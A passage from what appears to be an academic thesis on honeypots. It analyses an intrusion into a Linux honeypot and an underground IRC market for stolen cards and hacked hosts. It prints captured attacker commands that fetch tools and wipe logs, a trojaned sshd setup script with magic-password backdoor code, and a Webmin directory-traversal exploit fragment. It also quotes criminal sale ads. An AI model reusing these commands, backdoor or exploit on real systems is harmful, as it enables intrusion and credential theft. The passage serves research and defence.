Chantler, 1995). Therefore, various attempts have been made in the literature to divide
computer criminals into meaningful categories (cmp. Hollinger, 1988; Cross and Shinder, 2008). This categorization is a “necessary first step toward understanding these
individuals” (see Rogers, 2001, p. 48). To a great extent, however, the results of these
studies are quite dated at the time of this writing, mainly qualitative in nature, and
cannot be regarded as entirely representative (cmp. Rogers, 2001, p. 47-61). As Rogers
(2005, p. 2) concludes, “even with the current increase in computer crime rates, there
has been a lack of empirical studies based on a solid scientific method in this area”. For
this reason, he proposes a new, two-dimensional framework and distinguishes eight types of
attackers depending on their skills and motivation.
According to this model, the intruder we monitored can be classified as a novice
or cyber-punk. These individuals are described as technically less competent and as relying strongly
on pre-compiled toolkits in order to successfully penetrate a system. Their motivation primarily results from the rise in ego they feel when a machine is compromised as
well as the wish to be accepted as a legitimate part of the hacker subculture. Similar
observations are also reported by participants of the Hacker’s Profiling Project (HPP) [29],
an international research group that strives to create empirically-valid profiles for computer crimes (see also Chiesa et al., 2009). According to their experiences, these types
of blackhats are typically organized within some kind of group and scan the Internet
for specific vulnerabilities. Once a vulnerability is found, the respective computer is
exploited with the help of tools and simple scripts and is used for the purposes of the
adversary.
5.3.2 Attack on the Linux Honeypot
Our Fedora-based Linux honeypot was compromised after having been online for about
six weeks. The sequence of the intrusion is illustrated in the following section. Similar
to the attack presented in the previous section, we conclude with a short evaluation of
the incidents and briefly outline the alleged motives and characteristics of the intruder.
5.3.2.1 Sequence of the Attack
In the early morning of April 16, at 03:42:42 a.m., the monitoring devices of our Honeywall detect the beginning of an automated password brute force attack. The probes
originate from a machine with the IP address 192.104.xxx.xxx and target the secure shell
server of our Fedora-based Linux honeypot. Within a period of less than 25 minutes,
the weakly-protected root superuser account is compromised, and valid authentication
credentials are found.
More than two hours later, at 6:15:46 a.m., an adversary initiates an encrypted connection from the IP address 85.18.xxx.xxx and logs in for the first time. Although the
network channel is secured, we are able to accurately reconstruct the activities of the
intruder with the help of Sebek that is running on our decoy. An extract of the captured
keystrokes is shown in Listing 5.8. The individual steps of the attacker are described in
more detail below.
First, the blackhat disables the history functionality of the shell. The shell history is a
standard feature of the bash command interpreter and keeps track of all instructions that
are typed in over the system console for the convenience of the user (cmp. GNU Free
Software Foundation, 2009). Its behavior is controlled by several environment variables.
For instance, the variable HISTFILE defines the name of the file the history is written
to. If this variable is “unset” (cmp. Line 1 of Listing 5.8), the logging mechanism of the
shell is turned off, and commands are not persistently saved any longer (cmp. Ithilgore,
2008). To make sure the operation is carried out successfully, the attacker is careful to
delete potential aliases of the variable such as HISTSAVE or HISTLOG as well.
[29] see http://hpp.recursiva.org/en/index.php
 1  [06:16:10] unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY
 2             HISTLOG USERHST REMOTEHOST REMOTEUSER ;
 3             wget <...>/m.tar.gz ; tar -xzvf m.tar.gz ;
 4  [06:16:12] rm -rf m.tar.gz ; chmod +x m ; ./m -u root -n 1;
 5             rm -rf m
 6  [06:16:14] w
 7  [06:16:51] wget <...>/backdoor ; tar zxvf backdoor ;
 8             rm -rf backdoor ; cd .ssh ;
 9  [06:18:12] ./install
10  [06:24:59] w
11  [06:25:25] wget <...>/scan/scanner2 ; tar zxvf scanner2 ;
12             rm -rf scanner2 ; cd scan ; ./go.sh 71
13  [06:25:31] cd ..
14  [06:25:37] rm -rf .ssh
15  [06:25:49] w
16  [06:26:05] rm -rf scan
17  [06:26:44] w
18  [06:26:46] uname -a
19  [06:26:54] /sbin/ifconfig
Listing 5.8: Extract of Keystrokes Captured by Sebek
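Keystroke extracts of this kind lend themselves to simple automated triage. The following Python sketch groups timestamped lines into entries, joins continuation lines, and flags commands that contain a few marker strings. The input format (a bracketed hh:mm:ss timestamp followed by the command) and the marker list SUSPICIOUS are assumptions for this example; they do not reflect the native Sebek output format.

```python
import re
from typing import Iterable, List, Tuple

ENTRY = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\]\s*(.*)$")

# Hypothetical markers for history evasion, cleanup, and downloads.
SUSPICIOUS = ("unset HISTFILE", "rm -rf", "wget ")


def parse_keystrokes(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Turn raw lines into (timestamp, command) pairs; untimed lines continue the previous entry."""
    entries: List[List[str]] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        match = ENTRY.match(line)
        if match:
            entries.append([match.group(1), match.group(2)])
        elif entries:
            entries[-1][1] += " " + line
    return [(stamp, command) for stamp, command in entries]


def flag_suspicious(entries: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return the entries whose command contains at least one marker string."""
    return [(stamp, command) for stamp, command in entries
            if any(marker in command for marker in SUSPICIOUS)]
```

A plain substring match is deliberately simple; it produces false positives for legitimate administration work and would need tuning before being used outside of a honeypot.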
In the next step, the adversary starts downloading a compressed archive from a public Internet domain [30]. This archive contains a single binary m which is identified as the
MIG Logcleaner [31], version 2.0. As the name suggests, the program is capable of erasing specific entries in the main Linux log files /var/log/utmp, /var/log/wtmp, and
/var/log/lastlog. At 06:16:11 a.m., the application is invoked with the parameters
-u root and -n 1 (cmp. Line 4 of Listing 5.8) to remove all traces of the unauthorized
superuser access.
In addition to the log cleaner, the intruder also retrieves two archives from a private
website with the IP address 209.63.xxx.xxx (see Line 7 and Line 11). The first archive
contains a manipulated version of a secure shell server and is extracted to the hidden
directory .ssh. At 06:18:12 a.m., the server is compiled and set up with a custom
installation script that is displayed in Listing 5.9. Thereby, our own service on the
machine is replaced. What is more interesting, the syslog daemon of the operating
system is temporarily shut down during this process to prevent suspicious records of
these activities in the log files.
The file dm.h that is referenced in the installation script is not part of the original SSH
software. After a short examination of the respective source code, we discover a secret
trojan backdoor. The algorithm for this backdoor is outlined in Listing 5.10. As can be
seen on Line 6, the verification routine of the service is completely circumvented in case
a magic password is entered. Consequently, access to the system may be maintained
even if the intrusion is detected and the superuser password is changed at a later point
in time. On the other hand, if a legitimate user tries to log in, her credentials are
transparently written to a special log file that is controlled by the attacker, before the
original password checking function is called (see Line 15 and Line 20). These pieces of
information can possibly be used to attack further machines on the network.
[30] Note: The Internet address of the domain has been sanitized to protect the privacy of the involved
parties.
[31] see http://pc-freak.eu/sploits/info/download.txt
#!/bin/sh

# edit the configuration file of the trojaned service
pico dm.h

# configure, compile, and install the trojaned service
...

# overwrite the original daemon
cp -f ./sshd /usr/sbin/sshd
cp -f ./sshd /usr/local/sbin/sshd

# stop the original instance of the service and start the trojan
kill -9 `cat /var/run/sshd.pid`
/sbin/service syslog stop
/usr/sbin/sshd
/sbin/service syslog start
Listing 5.9: Setup Script of a Trojaned Secure Shell Server
 1  int sys_auth_passwd(Authctxt *authctxt, const char *password) {
 2      ...
 3
 4      // grant access at all times if the magic password is entered
 5      if ((strcmp(password, MAGIC_PASS)) == 0) {
 6          dm = 1;
 7          return 1;
 8      }
 9      else {
10          dm = 0;
11
12          // log authentication credentials
13          fd = fopen(LOGFILE, "a");
14          fprintf(fd, "%s:%s\n", authctxt->user, password);
15          fclose(fd);
16
17          // check whether the user has entered a correct password
18          return (strcmp(encrypted_password, pw_password) == 0);
19      }
20  }
Listing 5.10: Backdoor Mechanism Implemented in the Secure Shell Server
The second archive that is downloaded from the private website contains a network
scanner and a simple password brute force utility. These tools are coordinated by a
small auxiliary script. It is executed at 06:25:25 a.m. in order to probe an entire class A
network for vulnerable systems (cmp. Line 12 of Listing 5.8). However, these outbound
connections are blocked by our Honeywall to mitigate risks as far as possible.
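To give an impression of the scale of such a probe, the following Python sketch counts the addresses in a network. It assumes that the argument 71 passed to the script denotes the first octet of the target range, i.e., the network 71.0.0.0/8; this interpretation is ours and is not confirmed by the captured tools.

```python
import ipaddress


def address_count(cidr: str) -> int:
    """Return the number of IP addresses contained in a network given in CIDR notation."""
    return ipaddress.ip_network(cidr).num_addresses


if __name__ == "__main__":
    # A former class A network (/8) versus a former class B network (/16).
    print(address_count("71.0.0.0/8"))
    print(address_count("71.1.0.0/16"))
```

Under this assumption, a single invocation of the script would address more than 16 million hosts, which illustrates why blocking outbound connections on the Honeywall is essential.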
Before logging out, the adversary covers her tracks and deletes all files that have been
transferred to the honeypot during the intrusion. Furthermore, she briefly runs the
uname command to obtain basic information about the operating system and checks the
configuration of the network interface cards. At 06:27:08 a.m., the connection is closed.
April 17
The attacker returns on the following day at 06:45:14 p.m. In contrast to the preceding
session, the blackhat does not clean the log files but solely invokes the w command to
verify no other users are currently logged in on the machine. In the next step, the
psyBNC [32] IRC bouncer is retrieved from a private website and saved to a newly-created
hidden directory. An IRC bouncer acts as an intermediary between an IRC (Internet
Relay Chat) server and a corresponding client. Thereby, it is, for instance, possible
to maintain a connection with a certain communication channel, even if the client exits
at a specific point of time (cmp. Jestrix, 2003). As we will see later, this characteristic
is extremely beneficial to the intruder.
Before the application is executed, the adversary manipulates the IPTables packet
filtering software and adds a new rule:
/sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT
According to this rule, incoming TCP requests that are destined for port 8080 are to
be accepted. It is required by the bouncer to properly process inbound traffic.
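Rules of this kind can be spotted by comparing the active rule set with a list of expected ports. The following Python sketch assumes the rules are available as text in the format printed by iptables -S (one "-A INPUT ..." specification per line); the function name unexpected_open_ports and the sample rule set are hypothetical.

```python
import re
from typing import List, Set

# Matches INPUT rules that accept traffic for a single destination port.
RULE = re.compile(r"^-A INPUT\b.*--dport (\d+)\b.*-j ACCEPT\b")


def unexpected_open_ports(rules_text: str, allowed: Set[int]) -> List[int]:
    """Return destination ports accepted on INPUT that are not in the allowed set."""
    ports = []
    for line in rules_text.splitlines():
        match = RULE.match(line.strip())
        if match and int(match.group(1)) not in allowed:
            ports.append(int(match.group(1)))
    return ports


if __name__ == "__main__":
    sample = "\n".join([
        "-P INPUT DROP",
        "-A INPUT -p tcp -m tcp --dport 8080 -j ACCEPT",
        "-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT",
    ])
    print(unexpected_open_ports(sample, allowed={22}))
```

The sketch ignores port ranges and multiport matches, so it should be read as a starting point rather than a complete audit.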
At 06:46:22 p.m., psyBNC is finally run and starts working. In order to appear as
inconspicuous as possible, the main executable has been renamed to httpd and, thus, is
disguised as an instance of the httpd web server.
[32] see http://www.psybnc.at/
April 18
On April 18, a new encrypted network session is established with our decoy at 09:17:14
in the morning. The intruder quickly checks the list of users that are currently logged
in and begins to download a compressed archive from a web server with the IP address
85.204.xxx.xxx. The archive contains multiple tools and scripts that can be used to
scan hosts for instances of the Webmin [33] and Usermin [34] web applications. These applications provide graphical interfaces for basic administrative tasks (see Cameron, 2003).
Versions prior to 1.290 and 1.220, respectively, do not properly sanitize user-specific input. Thereby, attackers are able to access arbitrary files on the system of the victim (see
SecurityFocus, 2006d; CVE, 2006a). These security weaknesses may be automatically
exploited with a number of utilities that are included in the archive as well. To make the
procedure as easy as possible, a small helper script coordinates the interactions between
the different components. A flowchart of the activities is displayed in Figure 5.24.
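Whether a given installation falls into the affected version range can be checked with a simple comparison. The following Python sketch uses the version thresholds stated above (1.290 for Webmin, 1.220 for Usermin); the function names and the assumption that version strings consist of dot-separated integers are ours.

```python
from typing import Tuple

# First versions that are no longer affected, as stated in the text.
FIXED_IN = {"webmin": (1, 290), "usermin": (1, 220)}


def parse_version(text: str) -> Tuple[int, ...]:
    """Convert a version string such as '1.280' into a tuple of integers."""
    return tuple(int(part) for part in text.split("."))


def is_affected(product: str, version: str) -> bool:
    """Return True if the version is older than the first fixed release."""
    return parse_version(version) < FIXED_IN[product.lower()]
```

Comparing integer tuples instead of strings avoids ordering mistakes such as treating "1.90" as newer than "1.290".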
To initiate the attack sequence, an adversary simply needs to invoke the script go with
the address of a class B network. This information is passed to ss, a simple network
scanner that is identified as the Fast SYN Scanner by DrBIOS [35]. The program sends
two TCP synchronize (SYN) packets to each machine within the selected network range,
more precisely, to the ports 10000 and 20000 on which the Webmin and Usermin web
applications listen (see Cameron, 2003). If a packet is acknowledged, an active service
has been found, and the IP address of the host is logged.
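Administrators can verify in a similar way whether their own hosts expose these services. The following Python sketch is not a SYN scanner: it performs a complete TCP connection attempt, which requires no special privileges, and is meant for checking machines under one's own control. The function name tcp_port_open and the timeout value are assumptions for this example.

```python
import socket


def tcp_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a full TCP connection to host:port can be established."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        # connect_ex returns 0 on success and an error code otherwise.
        return sock.connect_ex((host, port)) == 0


if __name__ == "__main__":
    # Default ports of Webmin and Usermin as given in the text.
    for port in (10000, 20000):
        print(port, tcp_port_open("127.0.0.1", port))
```

In contrast to a half-open SYN probe, a full connection is recorded by the target service, which is acceptable for a self-assessment.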
At the end of the operation, the generated log file is processed by the scripts start,
do, and mycnf that check whether systems in the selected network segment are affected
by the vulnerability. If this is the case, the individual servers are attacked for the first
time, and the /etc/passwd file of the victim is retrieved in order to extract the list of
valid system users. For this purpose, a small Perl program a.pl must be executed. It
stores the actual exploit code that is illustrated in Listing 5.11.
The malicious directory traversal technique shown in Line 6 and 9 of Listing 5.11 is
used during a second attack to disclose further resources, including the /etc/shadow file
that saves hashes of the system passwords, various configuration files, and the command
histories of the users.
In the last step, the captured shadow file is read in by john, a popular password
cracking program [36], to start a brute force or dictionary attack on the encrypted authentication credentials. If this attack succeeds, control over additional machines may
be gained. For this reason, the adversary intends to probe both a single system with
the IP address 65.165.xxx.xxx and an entire network of a Belgian Internet service
provider. However, even though all utilities described above are fully functional, these
attempts remain unsuccessful, because the intruder fails to replace a hard-coded name
for the network interface card (eth1) with the correct, system-specific value (eth0). As
a result, the scanning process is aborted, and no outbound connections are established.
Obviously dissatisfied with the results, the blackhat deletes the complete toolkit
and logs out at 09:27:21 a.m.
[33] see http://www.webmin.com/
[34] see http://www.webmin.com/usermin.html
[35] see http://www.securiteam.com/tools/5EP0B0ADFO.html
[36] see http://www.openwall.com/john/
Figure 5.24: Flowchart Diagram of the Captured Attack Tools
 1  #!/usr/bin/perl
 2
 3  ...
 4  # generate a series of ../ instructions to break out of the root
 5  # directory of the web server
 6  $temp = "/..%01" x 80;
 7  ...
 8  # exploit the file disclosure vulnerability
 9  my $url = "http://" . $target . ":" . $port . "/unauthenticated/" . $temp .
10      $filename;
11
12  # retrieve the file
13  $content = get $url;
Listing 5.11: Exploit for the Webmin and Usermin Web Applications
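On the defending side, requests that use the traversal pattern of Listing 5.11 can be recognized in web server logs. The following Python sketch decodes a request path and looks for ".." path segments, optionally followed by a control character such as the %01 byte used by the exploit. The regular expression and the function name are assumptions for this example and do not cover other encoding tricks.

```python
import re
from urllib.parse import unquote

# A ".." path segment, optionally followed by one control character (e.g. %01).
TRAVERSAL = re.compile(r"(^|/)\.\.[\x00-\x1f]?(/|$)")


def looks_like_traversal(path: str) -> bool:
    """Return True if the percent-decoded request path contains a traversal segment."""
    return bool(TRAVERSAL.search(unquote(path)))


if __name__ == "__main__":
    print(looks_like_traversal("/unauthenticated/..%01/..%01/etc/passwd"))
    print(looks_like_traversal("/images/logo.png"))
```

Decoding the path before matching is the important design choice here, since the exploit relies on the encoded byte to slip past the application's own input check.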
About two hours later, at 11:16:01 a.m., the attacker returns and downloads an archive
with the eggdrop software [37] from an FTP server with the IP address 58.254.xxx.xxx.
Eggdrop provides numerous so-called bot functions for an IRC server. It is, for instance,
capable of automatically monitoring specific communication channels and serving requests (cmp. Pointer, 1997).
After extracting the program into the home directory of a non-privileged user, the
intruder retrieves a required static library and briefly edits several configuration files.
At 11:30:56 a.m., the bot is executed and joins the IRC network.
With the help of psyBNC that is installed on our honeypot, the adversary is able to
reconfigure the eggdrop application at all times. Furthermore, when participating in
an IRC communication channel, solely the IP address of our machine is revealed (cmp.
Jestrix, 2003). Thus, the real identity of the attacker may be effectively concealed. On
the other hand, due to the devices running on our Honeywall, we are also able to monitor
a great part of the activities the blackhat is involved in. An analysis of these activities is
the subject of Section 5.4; an evaluation of the attack as well as a description of the alleged
motives and characteristics of the intruder are presented below.
5.3.2.2 Evaluation of the Attack
The adversary launches an automated password brute force attack on our honeypot and
succeeds in compromising the weakly protected root superuser account of the operating
system. After logging in and carefully covering her traces, the intruder retrieves several
archives from different servers on the Internet. These archives comprise a trojaned
version of an SSH server that is installed on our decoy to secretly record usernames and
passwords, a network scanner, and multiple attack tools and scripts. Although the
blackhat attempts to probe several external networks, the respective systems are not
put at risk at any time due to the protection mechanisms of our Honeywall.
[37] see http://www.eggheads.org/
However, the attacker manages to set up bouncer software as well as a so-called bot
for the IRC network on our machine. As we will see in Section 5.4, these programs help
the blackhat administer a covert communication channel and participate in some type
of underground economy.
A brief description of the individual files and archives we have captured during the
intrusion can be found in Table 5.9; an overview of the entire incident is given in
Figure 5.25.
| Attack Tool | MD5 Checksum | Description |
|---|---|---|
| m | 9b0e266c08e8983f0c3e42a12bece88c | Log cleaning utility MIG Logcleaner 2.0 that is used by the adversary to manipulate the system log files and cover the traces of the intrusion. |
| backdoor | df192b169644892a7d85064d9c5b2f41 | Trojaned version of the secure shell server. After the service is installed on the honeypot, the adversary may gain access to the system by entering a magic password. Additionally, the authentication credentials of legitimate users are transparently written to a secret file when logging in. |
| ss | b51a52c9c82bb4401659b4c17c60f89f | Network scanner DrBIOS Fast SYN Scanner. The tool is capable of probing system ports of a large number of systems within a short amount of time. |
| psybnc | 54a6d04d4605f251d4caf6dc76af39d0 | Compressed archive that contains the source code files of the psybnc IRC bouncer. With the help of the bouncer, the adversary is able to join communication channels on the IRC network without revealing her real IP address and identity. |
| olinie.tar.gz | a5712fbed957d4ae9d0c6cdd93ec4d7b | Archive that stores 14 attack tools and scripts to probe servers for vulnerable instances of the Webmin or Usermin web applications. In case a security weakness is found, the respective machines are automatically exploited, and sensitive information such as usernames and passwords is transferred to the attacking host. |
| eggdrop | 99c1b3bdf7297e764030aeadfb05b1df | Source code archive of the eggdrop bot software. The program provides various automatic monitoring and administrative functions for IRC communication channels. |

Table 5.9: Attack Tools Used During the Compromise of the Linux Honeypot
Figure 5.25: Timeline of the Attack on the Linux Honeypot
5.3.2.3 Profile of the Attacker
Similar to the attack on our Windows honeypot, we attempt to create a basic profile of
the adversary based on the pieces of evidence we collected and draw conclusions about
her origin, her technical expertise, and her motivations. A more detailed taxonomy and
classification of the intruder is the subject of Section 5.3.2.4.
Presumable origin of the attacker: In total, six systems scattered over three continents
are involved in the incident: The password brute force attacks are traced to
a server in North America, whereas all encrypted connections are initiated
from a computer located in Italy. Finally, the additional software applications
and archives that are downloaded to our decoy during the intrusion are stored on four
different machines in the United States, China, and Romania.
Taking these aspects into consideration, we have reason to believe the blackhat intentionally obscures the source of her attack. Thus, the geographical location of a host
does not necessarily imply the real origin of the intruder. However, after a more in-depth
investigation of the compromise, we find two indications that the adversary is Romanian or of
Romanian descent: First, a great part of the attack tools and scripts that are transferred
to our honeypot contain Romanian messages and instructions.38 Second, the attacker
joins several private communication channels on the IRC network and chats in Romanian
before finally joining an English-speaking underground market (see Section 5.4).
Presumable expertise of the attacker: On the one hand, the adversary appears to have
a certain experience with Linux-based intrusions. With the help of multiple pre-packaged
archives, our decoy is quickly penetrated and brought under the full control of the blackhat. She
also makes sure to cover her traces and limits most of her sessions to short periods of
less than 15 minutes. On the other hand, the intruder is unable to properly operate
some of the attack tools that are downloaded to our machine and fails to specify correct
program variables. As a consequence, several attempts to probe external networks for
vulnerabilities repeatedly fail. Moreover, processes that are executed on the system are not effectively hidden from administrators or other maintenance personnel, e.g.,
by installing a rootkit as was done in the compromise of the Windows-based honeypot. For this reason, we presume that the technical expertise of the attacker is quite limited
and restricted to a number of step-by-step activities.
Presumable motivations of the attacker: With the help of the MEECES model that
we have briefly introduced in Section 5.3.1.3, we attempt to identify the prevalent motivations of the adversary that eventually led to the incident.
In contrast to the attack on our Windows-based honeypot, we did not find any evidence
that the intrusion was ego- or sociologically-driven, i.e., the compromise was neither carried
out solely for confidence-related reasons, nor for gaining entrance to a social group or
enhancing status. Additionally, we did not find any messages, logos, or other types of
personal statements that indicate a political or ideological motivation. Given that the intruder
made sure to cover her traces, subverted a system daemon, and systematically tried to
probe external network segments for vulnerabilities, we believe the attack has a serious
intention and must not be regarded as purely playful, i.e., for entertainment purposes. In
fact, our system acts as an intermediary for joining a covert communication channel. As
we will see in Section 5.4, various hacking-related goods and services such as stolen credit
cards or access to compromised online accounts are advertised for sale in this channel.
For this reason, we conclude that the attacker ultimately seeks to profit financially from
the intrusion.
38 Thanks to Viviana Nichica for translating the messages.
5.3.2.4 Taxonomy and Classification of the Attacker
Based on the technical expertise and the motivational drivers we have identified in the
previous section, we attempt to categorize the attacker according to the two-dimensional taxonomy framework developed by Rogers (2005) (cmp. Section 5.3.1.4).
As we have outlined, a meaningful and empirically valid classification helps “arrive at
some type of understanding about the motivation of individuals engaged in hacking”
and overcome the hurdles researchers face when studying miscreants (see Rogers, 2000a,
p. 1-2).
According to the framework, we classify the intruder we have observed as a petty thief.
As Rogers (2005, p. 4) points out, these types of computer criminals are motivated by
financial gain and greed. They “learn the prerequisite skills necessary to perpetrate the
crime”, as “the successful use of technology is crucial in order for them to fulfill their
need for money”. Due to these characteristics, petty thieves may become skilled over
time even if they appear to be technically less proficient at first and, thus, represent a
serious threat (cmp. Liu and Cheng, 2009).
5.4 Analysis of an Underground Communication Channel
As we have outlined in the previous section, an adversary managed to set up a so-called
bouncer and an IRC bot after successfully breaking into our Fedora-based Linux honeypot.
With the help of these applications, the intruder was able to maintain a permanent connection to the Internet Relay Chat network as well as automatically perform certain
administrative tasks within a specific underground communication channel. These tasks
included generating access rules for other channel members and providing basic usage
statistics. In cooperation with two additional bots that were already residing in the
channel, the attacker could thus effectively stay in control over the room.
With the help of the Honeywall, we were able to monitor a great part of the activities
over a period of about 10 weeks, from April 20, 2008 to June 30, 2008, and revealed
some form of underground market for hacking-related goods and services. An overview
of this market and its participants is presented in the following section.
5.4.1 Overview about the Captured Data
During the observation period, we recorded more than 676,000 messages that were publicly exchanged between the different channel members. As shown in Figure 5.26, the
number of messages sent per day varied from about 2,700 on April 25 to more than
21,000 on May 22. On an average day, we monitored slightly less than 12,000 messages.
Equally, the number of active users in the channel, as identified by their unique nickname (“nick”), varied between 18 on April 27 and 79 on May 10 (see Figure 5.27). On
average, 49 users were logged on and posted at least one message on any given day.
Figure 5.26: Number of Messages Sent per Day to the Communication Channel
To a high degree, the respective messages were sent to the channel repeatedly. In
many cases, for instance, automated scripts and programs periodically retransmitted
specific, pre-defined lines of text. For this reason, we were able to reduce the total
text corpus to a comparatively small set of 4,165 unique messages, ordered by their
frequency.
To assess the recorded communication more accurately, we manually categorized and
labeled the 417 most frequent messages (10% of the unique messages) in the next step. Due to the characteristics of the frequency distribution of the text corpus, these messages covered 84.5%
of all captured posts. The results of our analysis are outlined in the next section.
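The reduction to unique messages and the coverage of the most frequent ones can be sketched as follows. This is a minimal illustration in Python under the assumption that the captured posts are available as a list of strings; the function name is hypothetical and does not stem from the tools we used.

```python
import math
from collections import Counter


def coverage_of_top_fraction(messages, fraction=0.10):
    """Rank unique messages by frequency and measure how many of all
    posts are covered by the most frequent `fraction` of them.

    Returns (number of unique messages, number of selected messages,
    share of all posts covered by the selected messages).
    """
    if not messages:
        raise ValueError("no messages given")
    ranked = Counter(messages).most_common()  # most frequent first
    top_n = math.ceil(len(ranked) * fraction)
    covered = sum(count for _, count in ranked[:top_n])
    return len(ranked), top_n, covered / len(messages)
```

For 4,165 unique messages and a fraction of 10%, the sketch selects 417 messages, which corresponds to the size of the labeled sample described above.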
Figure 5.27: Number of Active Users per Day in the Communication Channel
5.4.2 Analysis of the Labeled Data
The 417 chosen messages were identified as either advertisements for various hacking-related goods and services, corresponding requests, or both. As indicated in Figure 5.28,
offers comprised about three quarters of the data set and outnumbered requests almost
five to one. In order to thoroughly classify the different samples, we assigned each message to one or more non-mutually exclusive categories that can be seen in Figure 5.29.
For instance, the message shown in Listing 5.12 advertises both stolen credit cards as
well as access to hacked online accounts and, thus, is assigned to two categories.
In the following, we analyze the labeled data in more detail and illustrate the individual
categories with the help of selected examples.
"Selling EU Dumps + Pin [ track1 / track2 ] ||
Paypal accounts with good balance [ verified / unverified ] ||
(...)
Dont waste my time or i will ignore you || For Deal ICQ : <xxx>"
Listing 5.12: Sample Advertisement for Hacking-Related Goods
Figure 5.28: Distribution of Offers and Requests for Hacking-Related Goods and Services
Figure 5.29: Types of Hacking-Related Goods and Services
5.4.2.1 Credit Card-Related Offers and Requests
In almost 4 out of 10 cases, adversaries posted advertisements for stolen credit cards
and credit card-related information. As McCarty (2003, p. 91) points out, the data may
either come from computer intrusions or be physically provided by morally questionable
personnel working at local banks, hotels, or restaurants. In the course of our analysis,
we have made similar observations.
Oftentimes, the information included both the personal identification number (PIN)
of the victim as well as her card verification value (CVV2). The latter is a three-digit
identification code that is frequently used for verifying the legitimacy of a credit card
during online transactions (cmp. Visa Inc., 2002). Two typical messages for such offers
that we have captured during the observation period are shown in the first two lines of
Listing 5.13. As can be seen with the second example, a blackhat advertises 30 newly
acquired (“fresh”) credit cards (“CCz”) for $200.
In contrast, we found corresponding requests in only 13.25% of the selected data
set. Two representative sample messages are displayed in the second half of Listing 5.13.
"Selling valid fresh unused Mastercards / Visa / American Express (...)"
"Selling Fresh France CCz With Cvv2 (...) 30 ccz = 200 $ (...)"

"Buying all valid cc’s Visa or Mastercard 7 $ Each! (...)"
"I need cvv2 From Italy, Who have privat me (...)"
Listing 5.13: Sample Advertisements and Requests for Stolen Credit Cards and Credit
Card-Related Information
5.4.2.2 Cash Out-Related Offers and Requests
As Thomas and Martin (2006) argue, one of the biggest challenges for Internet miscreants is to safely cash out the illegally obtained funds while mitigating the risk of getting
caught by law enforcement authorities at the same time. For this reason, blackhats
frequently cooperate with so-called cashiers, i.e., brokers who are willing to clean out
bank accounts of the victims. For a pre-defined, fixed fee, e.g., 50% of the total amount,
the cashier transfers the money directly to the adversary, typically within hours, by using online or offline services as offered by Western Union (WU)39 or E-Gold40 (see also
Franklin and Paxson, 2007). In many cases, additional third parties, so-called confirmers, are involved in this process as well and verify incoming payments.
Alternatively, the money may also be moved to a drop, an intermediary domestic or
offshore account, that helps impede prosecution but facilitates money laundering (cmp.
Thomas and Martin, 2006, p. 11-12). A summary of common advertisements and
requests for cashiers, confirmers, and drops can be found in Listing 5.14.
39 see http://www.westernunion.com/
40 see http://www.e-gold.com/
"Cashout USA Visa FULL INFO! = 50:50% SHARE! Legit Chaser! (...)"
"CASHING OUT MONEYBOOKERS ACCOUNT. (10.000 $ / DAILY)"
"Confirm Western Union ... PRV ME"
"I Got Legit U.S.A Item Drop, Split 50/50"

"I am looking for someone in US that can cashout pins. (...)"
"SPAMMER looking for some deals / trustable casheers. !!!"
"I’m looking for a WU confirmer for long term business (...)"
"Looking for a USA / Canada Drop, USA / Canada CVV Cashier (...)"
Listing 5.14: Sample Advertisements and Requests for Cashiers, Confirmers, and Drops
5.4.2.3 Further Financial Account-Related Offers and Requests
In addition to credit cards, their corresponding PINs, and CVVs, several other types
of financial account-related information were frequently offered and requested in the
underground communication channel we observed. For instance, in 12.75% of all cases,
adversaries advertised online logins for various major national and international banks,
e.g., HSBC, Halifax, the Bank of America (BOA), Chase, and Wells Fargo. Furthermore,
blackhats frequently offered access to numerous compromised online accounts, most
importantly to PayPal, an electronic money transfer service, and Amazon, the world’s
leading Internet retailer (cmp. Brohan, 2009). On the other hand, with a share of 1.75%
and 1%, respectively, requests for these goods and services were issued only marginally
(see Figure 5.29). Two sample messages for each category are illustrated in Listing 5.15.
"Selling BOA for 20 $ Hurry, Only Few to sell, Accept e-gold"
"Selling (...) ShopAdmins, Paypalz, Amazons,(...) Accept WU!"

"(T)rade for PayPal and some bank logins - (...) icq <xxx>"
"BUYING ALL VERFIED PAYPALS E-GOLD / WEST UNION"
Listing 5.15: Sample Advertisements and Requests for Bank Logins and Online Accounts
5.4.2.4 Hacking-Related Offers and Requests
In almost one out of seven messages of the sample data, adversaries offered hacked hosts for
sale. These hosts may, for instance, serve as intermediaries for further attacks or make
tracing more difficult (cmp. Honeynet Project, 2004c). As indicated in Listing 5.16,
blackhats periodically advertise larger numbers of penetrated systems in the form of
botnets as well. Depending on its size, a botnet may cause severe havoc,
e.g., when bringing down the network of a business competitor during a Distributed
Denial of Service (DDoS) attack (see Provos and Holz, 2007; Mirkovic and Reiher, 2004).
Compromised machines may also be used for spamming or phishing campaigns. In
the latter case, an attacker first sets up a so-called scam page that mimics the web
site of a legitimate, trusted service provider. In the next step, unaware computer users
are lured into visiting the fraudulent page, typically by sending specially crafted email
messages (cmp. Watson et al., 2005). The victims are then tricked into entering their
online credentials or other sensitive information that is of particular interest to
Internet miscreants. In 8.75% of the samples, adversaries explicitly advertised these
types of services, and 9.5% of the labeled data contained spam-related offers. Except for
spamming operations, corresponding requests were practically negligible. A number of
selected messages that we have obtained in the channel are presented in the lower half
of Listing 5.16.
"(S)elling hacked roots: linux, freeBSD, sunOS; hacked shells (...)"
"Selling botnets / bots For Reasonable Prices .. /msg for Instant deals"

"I want to buy root‘s or remote desktop msg me payment via e-gold"
"NEED REMOTE FROM USA - ADMINISTRATOR -> TRADE FOR ROOT URGENT!"

"I can host scampages ... /q <Nick> for details"
"Selling Fresh 5 Million Email List For Spamming"

"I need Scam Page Designer!! Msg me now!!"
"I am looking for a Spammer to be parteners!!!!"
Listing 5.16: Sample Advertisements and Requests for Hacked Hosts
5.4.2.5 Personal Information-Related Offers and Requests
In addition to credit card-related information, adversaries frequently advertised so-called
fulls, i.e., personal data that included the full address of the cardholder, her phone
number as well as her email address. Sample records as the one shown in Listing 5.17
were periodically posted to the channel, possibly as a proof of possession or to stimulate
demand. On the other hand, we measured corresponding requests in less than 1% of the
